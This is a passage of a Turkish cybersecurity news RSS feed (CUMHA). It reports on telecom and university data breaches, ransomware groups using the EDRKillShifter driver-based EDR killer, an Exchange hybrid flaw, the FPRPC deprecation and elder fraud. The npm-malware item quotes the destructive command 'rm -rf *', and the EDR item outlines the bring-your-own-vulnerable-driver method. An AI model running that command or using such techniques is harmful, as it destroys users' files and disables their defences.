<p data-start="1149" data-end="1539"><strong data-start="1149" data-end="1179">Yetkililer bilgilendirildi</strong><br data-start="1179" data-end="1182">Bouygues Telecom, saldırının bilinen bir siber suç grubu tarafından şirket içi kaynaklar hedef alınarak gerçekleştirildiğini belirtti. Konuyla ilgili olarak Fransa Ulusal Siber Güvenlik Ajansı (ANSSI) ve Kişisel Verileri Koruma Kurumu (CNIL) bilgilendirildi. Saldırıyı düzenleyenler için 5 yıla kadar hapis ve 150 bin euroya kadar para cezası öngörülüyor.</p>
<p data-start="1541" data-end="1953"><strong data-start="1541" data-end="1579">Müşterilere dolandırıcılık uyarısı</strong><br data-start="1579" data-end="1582">Şirket, müşterilerini SMS ve e-posta yoluyla bilgilendirmeye başladı. Açıklamada, kimlik avı ve sahte aramalara karşı dikkatli olunması gerektiği, hesap bilgilerini isteyen kişilere güvenilmemesi gerektiği uyarısı yapıldı. Ayrıca, IBAN bilgilerinin tek başına işlem için yeterli olmamasına rağmen müşterilerin hesap hareketlerini yakından takip etmeleri tavsiye edildi.</p>
<p data-start="1955" data-end="2260"><strong data-start="1955" data-end="1998">Fransız telekom sektöründe artan tehdit</strong><br data-start="1998" data-end="2001">Bouygues Telecom’daki ihlal, sadece bir hafta önce Orange’ın yaşadığı ağ saldırısının ardından geldi. Avrupa’daki bu gelişmeler, ABD merkezli telekom şirketlerini hedef alan ve Çin bağlantılı Salt Typhoon grubuna atfedilen saldırılarla benzerlik gösteriyor.</p>
<p data-start="2262" data-end="2435"><strong data-start="2262" data-end="2274"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Sekiz fidye yazılım grubu yeni EDR öldürücü aracı kullanıyor, güvenlik yazılımlarını devre dışı bırakıyor</title>
            <link>https://cumha.com.tr/sekiz-fidye-yazilim-grubu-yeni-edr-oeldurucu-araci-kullaniyor-guvenlik-yazilimlarini-devre-disi-birakiyor</link>
            <guid>https://cumha.com.tr/sekiz-fidye-yazilim-grubu-yeni-edr-oeldurucu-araci-kullaniyor-guvenlik-yazilimlarini-devre-disi-birakiyor</guid>
            <description><![CDATA[ Sophos araştırmacılarına göre RansomHub tarafından geliştirilen “EDRKillShifter” aracının gelişmiş bir versiyonu, sekiz farklı fidye yazılım grubu tarafından saldırılarda kullanılıyor. Araç, Sophos, Microsoft Defender, Kaspersky, Trend Micro, SentinelOne gibi önde gelen güvenlik ürünlerini devre dışı bırakarak sistemlerin şifrelenmesini kolaylaştırıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46e8ad6957.webp" length="57118" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:52 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Yeni EDR öldürücü araç nasıl çalışıyor, hangi fidye yazılım grupları bu aracı kullanıyor, hedef alınan güvenlik ürünleri hangileri, araç farklı gruplara nasıl yayıldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="521" data-end="869"><strong data-start="521" data-end="548">Yeni EDR öldürücü aracı</strong><br data-start="548" data-end="551">Sophos’un raporuna göre, fidye yazılım grupları tarafından kullanılan yeni EDR öldürücü aracı, güvenlik çözümlerini devre dışı bırakarak saldırganların ağlarda fark edilmeden hareket etmesine olanak sağlıyor. Araç, RansomHub, Blacksuit, Medusa, Qilin, Dragonforce, Crytox, Lynx ve INC grupları tarafından kullanıldı.</p>
<p data-start="871" data-end="1181"><strong data-start="871" data-end="912">BYOVD yöntemiyle kernel ayrıcalıkları</strong><br data-start="912" data-end="915">Araç, zararlı bir sürücüyü (çoğu zaman çalıntı ya da süresi dolmuş dijital sertifikayla imzalanmış) yükleyerek “Bring Your Own Vulnerable Driver” (BYOVD) saldırısı gerçekleştiriyor. Böylece çekirdek seviyesinde ayrıcalık kazanarak güvenlik yazılımlarını kapatıyor.</p>
<p data-start="1183" data-end="1417"><strong data-start="1183" data-end="1218">Hedef alınan güvenlik çözümleri</strong><br data-start="1218" data-end="1221">Saldırının hedefinde Sophos, Microsoft Defender, Kaspersky, Symantec, Trend Micro, SentinelOne, Cylance, McAfee, F-Secure, HitmanPro ve Webroot gibi çok sayıda EDR ve antivirüs ürünü yer alıyor.</p>
<p data-start="1419" data-end="1727"><strong data-start="1419" data-end="1458">Paylaşılan bir geliştirme altyapısı</strong><br data-start="1458" data-end="1461">Sophos, aracın tek bir sızıntı sonucu yayılmadığını, farklı fidye yazılım gruplarının aynı çerçeve üzerinden kendi sürümlerini oluşturduğunu belirtiyor. Tüm varyantlarda HeartCrypt paketleyicisinin kullanıldığı ve bilgi/araç paylaşımının yoğun olduğu ifade edildi.</p>
<p data-start="1729" data-end="1992"><strong data-start="1729" data-end="1771">Benzer araçlar daha önce de kullanıldı</strong><br data-start="1771" data-end="1774">EDRKillShifter dışında, AuKill ve AvNeutralizer gibi araçlar da farklı gruplar tarafından güvenlik yazılımlarını etkisiz hale getirmek için kullanılmıştı. Bu yöntem, fidye yazılım ekosisteminde giderek yaygınlaşıyor.</p>
<p data-start="1994" data-end="2179"><strong data-start="1994" data-end="2006"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>CISA, federal kurumlara yeni Microsoft Exchange açığını Pazartesi’ye kadar kapatma talimatı verdi</title>
            <link>https://cumha.com.tr/cisa-federal-kurumlara-yeni-microsoft-exchange-acigini-pazartesiye-kadar-kapatma-talimati-verdi</link>
            <guid>https://cumha.com.tr/cisa-federal-kurumlara-yeni-microsoft-exchange-acigini-pazartesiye-kadar-kapatma-talimati-verdi</guid>
            <description><![CDATA[ ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), CVE-2025-53786 olarak takip edilen kritik Microsoft Exchange açığının federal kurumlarda 11 Ağustos 2025 Pazartesi günü saat 09.00’a kadar kapatılmasını zorunlu tuttu. Açık, saldırganlara yerel Exchange sunucularından Microsoft bulut ortamlarına yatay hareket imkânı vererek tüm etki alanının ele geçirilmesine yol açabiliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46e9a75662.webp" length="42940" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:48 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Microsoft Exchange CVE-2025-53786 açığı nasıl çalışıyor, CISA federal kurumlara hangi adımları zorunlu kıldı, saldırı ne zaman keşfedildi, özel şirketler için ne tür riskler var</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="539" data-end="913"><strong data-start="539" data-end="587">Açık hibrit Exchange yapılarını hedef alıyor</strong><br data-start="587" data-end="590">CVE-2025-53786 güvenlik açığı, Microsoft Exchange Server 2016, 2019 ve Subscription Edition sürümlerini etkiliyor. Hibrit yapılarda yerel sunucu ve Exchange Online arasında paylaşılan servis hesabı kullanılması nedeniyle, saldırganlar yetkili token veya API çağrılarını taklit ederek bulut tarafına erişim sağlayabiliyor.</p>
<p data-start="915" data-end="1168"><strong data-start="915" data-end="938">Tespit edilmesi zor</strong><br data-start="938" data-end="941">Microsoft’un açıklamasına göre, saldırılar yerel Exchange sunucularından geldiğinde Microsoft Purview gibi bulut tabanlı loglama araçları bu etkinlikleri kaydetmeyebiliyor. Bu durum saldırıların fark edilmesini güçleştiriyor.</p>
<p data-start="1170" data-end="1445"><strong data-start="1170" data-end="1207">Araştırmacı Black Hat’te gösterdi</strong><br data-start="1207" data-end="1210">Outsider Security’den araştırmacı Dirk-Jan Mollema, Black Hat konferansında açığı göstererek Microsoft’a üç hafta önce rapor ettiğini açıkladı. Microsoft, konferansla eş zamanlı olarak güvenlik duyurusu ve gerekli yamaları yayımladı.</p>
<p data-start="1447" data-end="1542"><strong data-start="1447" data-end="1484">Federal kurumlara zorunlu adımlar</strong><br data-start="1484" data-end="1487">CISA’nın 25-02 sayılı acil direktifine göre kurumlar:</p>
<ul data-start="1543" data-end="1916">
<li data-start="1543" data-end="1614">
<p data-start="1545" data-end="1614">Microsoft Health Checker script ile Exchange ortamlarını tarayacak,</p>
</li>
<li data-start="1615" data-end="1657">
<p data-start="1617" data-end="1657">Destek dışı sunucuları ağdan ayıracak,</p>
</li>
<li data-start="1658" data-end="1744">
<p data-start="1660" data-end="1744">Güncel kümülatif yamaları (Exchange 2019 için CU14/15, 2016 için CU23) yükleyecek,</p>
</li>
<li data-start="1745" data-end="1783">
<p data-start="1747" data-end="1783">Nisan 2025 hotfix’ini uygulayacak,</p>
</li>
<li data-start="1784" data-end="1916">
<p data-start="1786" data-end="1916">Ardından <code data-start="1795" data-end="1835">ConfigureExchangeHybridApplication.ps1</code> scripti ile paylaşımlı servis hesabından özel hibrit uygulamaya geçiş yapacak.</p>
</li>
</ul>
<p data-start="1918" data-end="2047">Kurumların teknik düzeltmeleri Pazartesi sabahına kadar tamamlaması ve aynı gün 17.00’ye kadar CISA’ya rapor sunması gerekiyor.</p>
<p data-start="2049" data-end="2244"><strong data-start="2049" data-end="2074">Tüm kuruluşlara uyarı</strong><br data-start="2074" data-end="2077">CISA, zorunluluk yalnızca federal kurumlar için geçerli olsa da, açığın tüm sektörlerde risk oluşturduğunu belirterek özel kuruluşları da güncelleme yapmaya çağırdı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Sahte WhatsApp kütüphaneleri geliştirici bilgisayarlarını siliyor, Go ekosistemi de hedefte</title>
            <link>https://cumha.com.tr/sahte-whatsapp-kutuphaneleri-gelistirici-bilgisayarlarini-siliyor-go-ekosistemi-de-hedefte</link>
            <guid>https://cumha.com.tr/sahte-whatsapp-kutuphaneleri-gelistirici-bilgisayarlarini-siliyor-go-ekosistemi-de-hedefte</guid>
            <description><![CDATA[ NPM’de WhatsApp geliştirici araçları gibi görünen iki zararlı paket, kurbanların bilgisayarındaki dosyaları topluca silen yıkıcı kod içeriyor. Araştırmacılar, bu sahte kütüphanelerin 1.100’den fazla kez indirildiğini belirledi. Aynı yayıncıya ait başka paketler de risk altında olabilir. Go ekosisteminde de 11 zararlı paket tespit edildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46ea765084.webp" length="76440" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:46 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Sahte WhatsApp kütüphaneleri nasıl çalışıyor, bu paketlerden kaç geliştirici etkilendi, hangi veriler risk altında, Go ekosisteminde hangi zararlı paketler keşfedildi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="491" data-end="772"><strong data-start="491" data-end="530">NPM’de sahte WhatsApp kütüphaneleri</strong><br data-start="530" data-end="533">Siber güvenlik şirketi Socket, NPM platformunda WhatsApp geliştirme araçları kılığına giren iki zararlı paketi tespit etti. “naya-flore” ve “nvlore-hsc” isimli paketler, WhatsApp botları ve otomasyon araçları geliştirenleri hedef alıyor.</p>
<p data-start="774" data-end="1142"><strong data-start="774" data-end="809">Dosya silme komutu çalıştırıyor</strong><br data-start="809" data-end="812">Her iki pakette de “requestPairingCode” adlı fonksiyon, WhatsApp eşleştirme işlemi gibi görünse de aslında bir GitHub adresinden gelen verileri işliyor. Belirli telefon numaralarına sahip kullanıcılar hariç, hedef alınan geliştiricilerin sisteminde “rm -rf *” komutu çalıştırılıyor ve bulunduğu dizindeki tüm dosyalar siliniyor.</p>
<p data-start="1144" data-end="1444"><strong data-start="1144" data-end="1179">Veri sızdırma fonksiyonu da var</strong><br data-start="1179" data-end="1182">Paketlerde ayrıca “generateCreeds” adlı, telefon numarası, cihaz kimliği ve anahtar bilgilerini çalabilecek bir fonksiyonun da bulunduğu tespit edildi. Bu fonksiyon şu an yorum satırına alınmış durumda ancak ileride aktif hale getirilebileceği uyarısı yapıldı.</p>
<p data-start="1446" data-end="1762"><strong data-start="1446" data-end="1484">Go geliştiricileri de risk altında</strong><br data-start="1484" data-end="1487">Socket, aynı zamanda Go ekosisteminde 11 zararlı paket keşfetti. Bu paketler, sahte isimlerle yüklenip çalıştırıldığında uzaktan yüklenen zararlı komut dosyalarını çalıştırıyor. Çoğu, yazım hatalarına dayalı “typosquatting” yöntemiyle geliştiricileri yanıltmayı hedefliyor.</p>
<p data-start="1764" data-end="1963"><strong data-start="1764" data-end="1789">Geliştiricilere uyarı</strong><br data-start="1789" data-end="1792">Araştırmacılar, hem NPM hem de Go geliştiricilerinin kullandıkları kütüphaneleri dikkatle doğrulamaları gerektiğini vurguladı. Birçok paket hâlâ aktif durumda bulunuyor.</p>
<p data-start="1965" data-end="2150"><strong data-start="1965" data-end="1977"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Royal ve BlackSuit fidye yazılım grupları 450’den fazla ABD şirketini hedef aldı, 370 milyon dolar fidye topladı</title>
            <link>https://cumha.com.tr/royal-ve-blacksuit-fidye-yazilim-gruplari-450den-fazla-abd-sirketini-hedef-aldi-370-milyon-dolar-fidye-topladi</link>
            <guid>https://cumha.com.tr/royal-ve-blacksuit-fidye-yazilim-gruplari-450den-fazla-abd-sirketini-hedef-aldi-370-milyon-dolar-fidye-topladi</guid>
            <description><![CDATA[ ABD İç Güvenlik Bakanlığı, Royal ve BlackSuit fidye yazılım çetelerinin 2022’den bu yana sağlık, eğitim, enerji, kamu güvenliği ve devlet kurumları dahil 450’den fazla kuruluşa saldırdığını açıkladı. Çetelerin çifte şantaj yöntemleriyle 370 milyon dolardan fazla fidye geliri elde ettiği, geçen ay gerçekleştirilen uluslararası “Operation Checkmate” operasyonuyla altyapılarının çökertildiği bildirildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46eb4de0b0.webp" length="48640" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:45 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Royal ve BlackSuit fidye yazılım grupları hangi sektörleri hedef aldı, toplam ne kadar fidye geliri elde edildi, gruplar nasıl çökertildi, Chaos ransomware BlackSuit’in devamı mı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="576" data-end="854"><strong data-start="576" data-end="609">Çete 2022’den bu yana aktifti</strong><br data-start="609" data-end="612">ABD İç Güvenlik Soruşturmaları (HSI), Royal ve BlackSuit olarak bilinen siber suç grubunun altyapısının uluslararası iş birliğiyle geçen ay çökertildiğini duyurdu. Grubun 2022’den bu yana 450’den fazla ABD şirketini hedef aldığı belirlendi.</p>
<p data-start="856" data-end="1128"><strong data-start="856" data-end="901">Çifte şantaj yöntemiyle milyonlarca dolar</strong><br data-start="901" data-end="904">Açıklamaya göre saldırganlar, sistemleri şifreleyerek kullanılamaz hale getiriyor, ardından çalınan verileri sızdırma tehdidiyle ödeme talep ediyordu. Bu yöntemle elde edilen fidye miktarı 370 milyon doların üzerine çıktı.</p>
<p data-start="1130" data-end="1414"><strong data-start="1130" data-end="1171">Conti’den Royal’a, oradan BlackSuit’a</strong><br data-start="1171" data-end="1174">Grup ilk kez 2022 başında Quantum fidye yazılımıyla ortaya çıktı ve Conti çetesinin halefi olarak değerlendirildi. Aynı yıl Royal markasıyla yeniden ortaya çıkan grup, 2023’te Dallas şehrini hedef aldıktan sonra BlackSuit adını benimsedi.</p>
<p data-start="1416" data-end="1690"><strong data-start="1416" data-end="1455">Uluslararası operasyonla çökertildi</strong><br data-start="1455" data-end="1458">ABD Adalet Bakanlığı, 24 Temmuz 2025’te yaptığı açıklamada BlackSuit’in karanlık ağ sitelerinin ele geçirildiğini ve yerine “seizure banner” uyarılarının yerleştirildiğini duyurdu. Operasyonun kod adı “Checkmate” olarak açıklandı.</p>
<p data-start="1692" data-end="2017"><strong data-start="1692" data-end="1729">Yeni kimlikle geri dönüş ihtimali</strong><br data-start="1729" data-end="1732">Cisco Talos araştırmacıları, BlackSuit’in yeniden yapılanarak Chaos adıyla faaliyet göstermeye başladığına dair bulgular tespit etti. Yeni yapı, fidye yazılım hizmeti (RaaS) modeliyle çalışıyor ve hem yerel hem uzak depolamayı hedef alan saldırılarda çifte şantaj yöntemi kullanıyor.</p>
<p data-start="2019" data-end="2216"><strong data-start="2019" data-end="2031"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Columbia Üniversitesi veri ihlali: 870 bin öğrenci ve çalışan kişisel, finansal ve sağlık verilerini kaybetti</title>
            <link>https://cumha.com.tr/columbia-universitesi-veri-ihlali-870-bin-oegrenci-ve-calisan-kisisel-finansal-ve-saglik-verilerini-kaybetti</link>
            <guid>https://cumha.com.tr/columbia-universitesi-veri-ihlali-870-bin-oegrenci-ve-calisan-kisisel-finansal-ve-saglik-verilerini-kaybetti</guid>
            <description><![CDATA[ ABD’deki Columbia Üniversitesi, Mayıs 2025’te yaşanan siber saldırıda 868 bin 969 kişinin kişisel, finansal ve sağlık bilgilerinin çalındığını açıkladı. Çalınan veriler arasında doğum tarihi, Sosyal Güvenlik numarası, akademik geçmiş ve sigorta bilgileri bulunuyor. Üniversite, etkilenenlere iki yıl ücretsiz kimlik koruma hizmeti sunacak. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46ec195b5a.webp" length="77122" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:44 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Columbia Üniversitesi veri ihlalinde kaç kişi etkilendi, hangi kişisel bilgiler sızdırıldı, saldırı nasıl fark edildi, mağdurlara hangi destekler sunulacak</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="509" data-end="798"><strong data-start="509" data-end="541">Saldırı Mayıs’ta gerçekleşti</strong><br data-start="541" data-end="544">Columbia Üniversitesi, 16 Mayıs 2025 civarında yetkisiz erişim yoluyla ağ sistemlerine girildiğini ve belirli dosyaların dışarıya çıkarıldığını duyurdu. Olay, 24 Haziran’da sistemlerde yaşanan kesinti sonrası başlatılan inceleme sırasında ortaya çıktı.</p>
<p data-start="800" data-end="1055"><strong data-start="800" data-end="833">870 bine yakın kişi etkilendi</strong><br data-start="833" data-end="836">Üniversitenin Maine Başsavcılığı’na sunduğu belgelerde, 868 bin 969 kişinin ihlalden etkilendiği belirtildi. Bu kişiler arasında mevcut ve eski öğrenciler, başvuru sahipleri, çalışanlar ve bazı aile üyeleri bulunuyor.</p>
<p data-start="1057" data-end="1417"><strong data-start="1057" data-end="1092">Çalınan verilerin kapsamı geniş</strong><br data-start="1092" data-end="1095">Bildirim mektuplarına göre, etkilenen veriler arasında ad, doğum tarihi, Sosyal Güvenlik numarası, iletişim bilgileri, demografik veriler, akademik kayıtlar, mali yardım bilgileri ve sağlık ile sigorta verileri yer alıyor. Üniversite, Columbia University Irving Medical Center hasta kayıtlarının etkilenmediğini duyurdu.</p>
<p data-start="1419" data-end="1741"><strong data-start="1419" data-end="1453">Ücretsiz kimlik koruma desteği</strong><br data-start="1453" data-end="1456">Columbia Üniversitesi, çalınan verilerin henüz dolandırıcılıkta kullanılmadığına dair bir bulgu olmadığını açıklasa da, mağdurlara iki yıl boyunca Kroll üzerinden ücretsiz kredi izleme, dolandırıcılık danışmanlığı ve kimlik hırsızlığına karşı destek hizmetleri sunulacağını bildirdi.</p>
<p data-start="1743" data-end="1932"><strong data-start="1743" data-end="1786">Hacker 460 GB veri çaldığını iddia etti</strong><br data-start="1786" data-end="1789">Üniversite, geçtiğimiz hafta yaptığı ilk açıklamada, saldırganın yaklaşık 460 gigabayt veriyi ele geçirdiği yönündeki iddiaları doğrulamıştı.</p>
<p data-start="1934" data-end="2108"><strong data-start="1934" data-end="1946"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft 365 uygulamaları eski FPRPC protokolüyle dosya erişimini varsayılan olarak engelleyecek</title>
            <link>https://cumha.com.tr/microsoft-365-uygulamalari-eski-fprpc-protokoluyle-dosya-erisimini-varsayilan-olarak-engelleyecek</link>
            <guid>https://cumha.com.tr/microsoft-365-uygulamalari-eski-fprpc-protokoluyle-dosya-erisimini-varsayilan-olarak-engelleyecek</guid>
            <description><![CDATA[ Microsoft, Windows için Microsoft 365 uygulamalarının Ağustos 2025’ten itibaren eski ve güvensiz FPRPC (FrontPage Remote Procedure Call) protokolüyle dosya açmayı varsayılan olarak engelleyeceğini duyurdu. Değişiklik, kullanıcıları eski kimlik doğrulama yöntemlerine yönelik saldırılardan korumayı amaçlıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46ece58d1d.webp" length="42712" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:41 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Microsoft 365 uygulamalarında FPRPC protokolü neden engelleniyor, değişiklik ne zaman yürürlüğe girecek, yöneticiler protokol ayarlarını nasıl kontrol edecek, Microsoft son dönemde hangi güvenlik adımlarını attı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="466" data-end="724"><strong data-start="466" data-end="498">FPRPC devre dışı bırakılıyor</strong><br data-start="498" data-end="501">Microsoft, 365 uygulamalarının 2508 sürümüyle birlikte FPRPC üzerinden dosya erişiminin varsayılan olarak engelleneceğini açıkladı. Engelleme Ağustos sonunda başlayacak, tüm kullanıcılara Eylül 2025 sonuna kadar ulaşacak.</p>
<p data-start="726" data-end="1021"><strong data-start="726" data-end="759">FTP ve HTTP için yeni ayarlar</strong><br data-start="759" data-end="762">Yeni Trust Center ayarlarıyla kullanıcılar, yöneticiler izin verdiği sürece FPRPC’yi yeniden etkinleştirebilecek. Ayrıca FTP ve HTTP üzerinden dosya açma işlemleri hâlen varsayılan olarak açık olsa da, kullanıcıların bu protokolleri kapatma seçeneği olacak.</p>
<p data-start="1023" data-end="1285"><strong data-start="1023" data-end="1056">Yöneticiler için CPS kontrolü</strong><br data-start="1056" data-end="1059">Yöneticiler, Cloud Policy Service (CPS) üzerinden kimlik doğrulama protokollerini yönetebilecek. Eğer bir protokol CPS üzerinden devre dışı bırakılırsa, kullanıcılar Trust Center ayarlarıyla yeniden aktif hale getiremeyecek.</p>
<p data-start="1287" data-end="1688"><strong data-start="1287" data-end="1331">Microsoft güvenlik önlemlerini artırıyor</strong><br data-start="1331" data-end="1334">Şirket, son dönemde güvenlik açıklarını azaltmak için art arda önlemler aldı. Ocak 2025’ten itibaren ActiveX kontrolleri Microsoft 365 ve Office 2024’te devre dışı bırakıldı. Temmuz ayında Teams toplantılarında ekran görüntüsü engelleme özelliği devreye alındı. Outlook’ta ise .library-ms ve .search-ms dosya türleri engellenen ekler listesine eklendi.</p>
<p data-start="1690" data-end="1920"><strong data-start="1690" data-end="1702"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ABD Federal Yargısı, elektronik dava kayıt sistemine siber saldırıyı doğruladı</title>
            <link>https://cumha.com.tr/abd-federal-yargisi-elektronik-dava-kayit-sistemine-siber-saldiriyi-dogruladi</link>
            <guid>https://cumha.com.tr/abd-federal-yargisi-elektronik-dava-kayit-sistemine-siber-saldiriyi-dogruladi</guid>
            <description><![CDATA[ ABD Federal Yargısı, mahkeme belgelerinin tutulduğu elektronik kayıt sisteminin sofistike siber saldırılarla hedef alındığını açıkladı. Çoğu belgenin kamuya açık olduğu belirtilse de gizli dosyaların korunması için erişim kısıtlamaları artırıldı. Politico’nun haberine göre ihlal, bazı gizli tanıkların kimliklerini açığa çıkarmış olabilir. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46edb19f80.webp" length="64632" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:40 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>ABD Federal Yargısı’nın elektronik dava kayıt sisteminde hangi veriler risk altında, saldırı ne zaman fark edildi, Politico hangi iddiaları gündeme getirdi, kurum hangi önlemleri açıkladı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="479" data-end="743">ABD Federal Yargısı, elektronik dava yönetim sistemi CM/ECF ve PACER’in gelişmiş ve ısrarcı saldırılarla hedef alındığını doğruladı. Açıklamada, özellikle gizli belgelerin artık daha sıkı erişim kontrolleriyle korunduğu bildirildi.</p>
<p data-start="745" data-end="1130"><strong data-start="745" data-end="794">Politico’nun iddiaları sonrası açıklama geldi</strong><br data-start="794" data-end="797">Politico’nun hafta başında yayımladığı haberde, saldırının bazı federal bölgelerde gizli bilgileri ortaya çıkardığı, hatta gizli tanıkların kimliklerini açığa çıkarmış olabileceği öne sürülmüştü. Kurumun yaptığı açıklama bu iddiaları doğrudan teyit etmese de, davacıları etkileyecek verilerin zarar görmüş olabileceğini ima ediyor.</p>
<p data-start="1132" data-end="1380"><strong data-start="1132" data-end="1159">4 Temmuz’da fark edildi</strong><br data-start="1159" data-end="1162">İsimsiz kaynaklara göre, saldırının boyutu 4 Temmuz 2025’te tam olarak anlaşıldı ve ardından kurum içinde gizli bir bilgilendirme yapıldı. Ancak kamuoyuna ilk resmi açıklama ancak Politico’nun haberinden sonra geldi.</p>
<p data-start="1382" data-end="1637"><strong data-start="1382" data-end="1416">Güvenlik önlemleri artırılıyor</strong><br data-start="1416" data-end="1419">Yargı yetkilileri, sistemin güvenliğinin artırıldığını, saldırıları engellemek için yeni önlemler alındığını ve mahkemelerle iş birliği yapılarak davacılar üzerindeki etkinin en aza indirilmeye çalışıldığını duyurdu.</p>
<p data-start="1639" data-end="1862"><strong data-start="1639" data-end="1677">Kamu ve özel sektörde artan tehdit</strong><br data-start="1677" data-end="1680">Federal Yargı, hem kamu hem de özel kurumlara yönelik siber saldırıların artan hacim ve karmaşıklığına dikkat çekerek, eski sistemlerin korunmasının giderek zorlaştığını vurguladı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ABD’de 60 yaş üstü kişiler 2024’te dolandırıcılara 700 milyon dolar kaybetti</title>
            <link>https://cumha.com.tr/abdde-60-yas-ustu-kisiler-2024te-dolandiricilara-700-milyon-dolar-kaybetti</link>
            <guid>https://cumha.com.tr/abdde-60-yas-ustu-kisiler-2024te-dolandiricilara-700-milyon-dolar-kaybetti</guid>
            <description><![CDATA[ ABD Federal Ticaret Komisyonu’nun (FTC) yayımladığı rapora göre, 2024 yılında 60 yaş üstü Amerikalılar çevrim içi dolandırıcılıklarda 700 milyon dolar kaybetti. Bu rakam, 2020 yılına kıyasla altı kat artışa, 2023’e kıyasla ise yüzde 30 yükselişe işaret ediyor. FTC, en yaygın yöntemlerin sahte resmi kurum kimlikleri, acil durum senaryoları ve telefon dolandırıcılığı olduğunu açıkladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46ee812f45.webp" length="61616" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:39 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>ABD’de 60 yaş üstü kişiler 2024’te dolandırıcılara ne kadar para kaybetti, en yaygın dolandırıcılık yöntemleri neler, kayıplar önceki yıllara göre nasıl değişti, yaşlılar neden hedef alınıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="523" data-end="818"><strong data-start="523" data-end="555">Kayıplar 2024’te rekor kırdı</strong><br data-start="555" data-end="558">FTC’nin Tüketici Koruma Veri Raporu’na göre 2024 yılında 60 yaş üstü bireyler toplamda 700 milyon dolarını dolandırıcılara kaptırdı. Bu miktar, 2020’deki 121 milyon dolarlık kaybın altı katına, 2023’teki 542 milyon dolarlık kaybın ise yüzde 30 üzerine çıktı.</p>
<p data-start="820" data-end="1099"><strong data-start="820" data-end="860">En büyük kayıp 100 bin dolar üstünde</strong><br data-start="860" data-end="863">Rapor, 2024’te 100 bin doların üzerinde kayıp yaşayanların toplam 445 milyon dolar kaybettiğini ortaya koydu. 10 ila 100 bin dolar arası kayıplar 214 milyon dolar, 10 bin dolar altındaki kayıplar ise 41 milyon dolar olarak kaydedildi.</p>
<p data-start="1101" data-end="1436"><strong data-start="1101" data-end="1149">Dolandırıcıların en sık kullandığı yöntemler</strong><br data-start="1149" data-end="1152">Dolandırıcılık yöntemleri arasında resmi kurum ya da şirket kılığına girme, sahte kriz senaryoları ve telefonla baskı en öne çıkanlar oldu. Dolandırıcılar, bankalarda şüpheli işlem, sosyal güvenlik numarasıyla işlenen suç veya bilgisayar korsanlığı iddialarıyla mağdurları kandırdı.</p>
<p data-start="1438" data-end="1730"><strong data-start="1438" data-end="1474">FTC adına sahte aramalar yapıldı</strong><br data-start="1474" data-end="1477">FTC’nin açıklamasına göre bazı dolandırıcılar, ironiyle kurumun adını kullanarak sahte personel kimliğiyle insanları kandırdı. Mağdurlara, paralarını Bitcoin ATM’lerine yatırmaları, nakit veya altın teslim etmeleri gibi asılsız yönlendirmeler yapıldı.</p>
